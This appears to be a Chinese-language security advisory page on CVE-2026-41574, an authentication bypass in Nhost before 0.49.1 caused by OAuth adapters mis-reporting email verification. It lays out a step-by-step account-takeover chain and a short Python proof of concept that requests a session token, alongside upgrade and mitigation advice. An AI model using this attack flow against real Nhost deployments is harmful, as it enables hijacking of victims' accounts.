CVE-2026-41574 CVSS 9.8 严重

CVE-2026-41574 Nhost 身份认证绕过漏洞

披露日期: 2026-05-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41574

漏洞类型

身份认证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Nhost

漏洞概述

Nhost 在 0.49.1 版本之前存在严重的身份认证绕过漏洞。由于多个 OAuth 提供商适配器未能正确验证电子邮件所有权，攻击者可以通过伪造的未验证电子邮件接管受害者账户，获取完全认证的会话权限。

技术细节

该漏洞源于 Nhost 在处理 OAuth 登录时，过度信任第三方适配器返回的 `profile.EmailVerified` 字段。受影响的适配器（包括 Discord、Bitbucket、AzureAD 和 EntraID）存在逻辑缺陷：Discord 丢弃了 API 返回的验证字段，Bitbucket 将未确认邮件标记为已验证，AzureAD/EntraID 则基于用户主体名称（UPN）等非所有权证明字段推导邮箱。攻击者利用此缺陷，只需在 OAuth 提供商处注册被害人的邮箱地址（无需通过邮箱验证），即可通过 Nhost 的自动关联机制登录受害者的账户，导致严重的账户接管风险。

攻击链分析

STEP 1

侦察

攻击者识别目标站点使用的是受影响版本的 Nhost (<0.49.1)。

STEP 2

准备

攻击者获取受害者已知的电子邮箱地址。

STEP 3

漏洞利用

攻击者在存在缺陷的 OAuth 提供商（如 Discord 或 Bitbucket）处注册账号，使用受害者的邮箱地址，但跳过邮箱验证步骤。

STEP 4

身份合并

攻击者利用该 OAuth 账号登录目标 Nhost 应用。由于适配器错误地将该邮箱标记为已验证，Nhost 自动将其与受害者现有的账户关联。

STEP 5

达成目标

攻击者成功获得受害者账户的完全访问权限（会话劫持）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This is a conceptual PoC demonstrating the attack flow.
# Actual exploitation requires specific configurations on the OAuth provider side.

import requests

# Target Nhost instance
target_url = "https://target-nhost-instance.com/v1/auth/signin/provider/token"

# Attacker controls this account on the OAuth provider (e.g., Discord)
# registered with victim's email but unverified.
attacker_oauth_token = "fake_provider_access_token"

# Payload structure typically sent to Nhost backend
payload = {
    "provider": "discord", # or bitbucket, azuread, entraid
    "accessToken": attacker_oauth_token,
    "nonce": "random_nonce_value"
}

# Send request
response = requests.post(target_url, json=payload)

if response.status_code == 200:
    print("[+] Successful Account Takeover!")
    print("[+] Session Token:", response.json().get('sessionToken'))
else:
    print("[-] Exploit failed")

影响范围

Nhost < 0.49.1

防御指南

临时缓解措施

建议立即将 Nhost 升级至包含补丁的版本。如果无法立即升级，应暂时禁用受影响的 OAuth 登录方式（特别是 Discord、Bitbucket、AzureAD 和 EntraID），直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表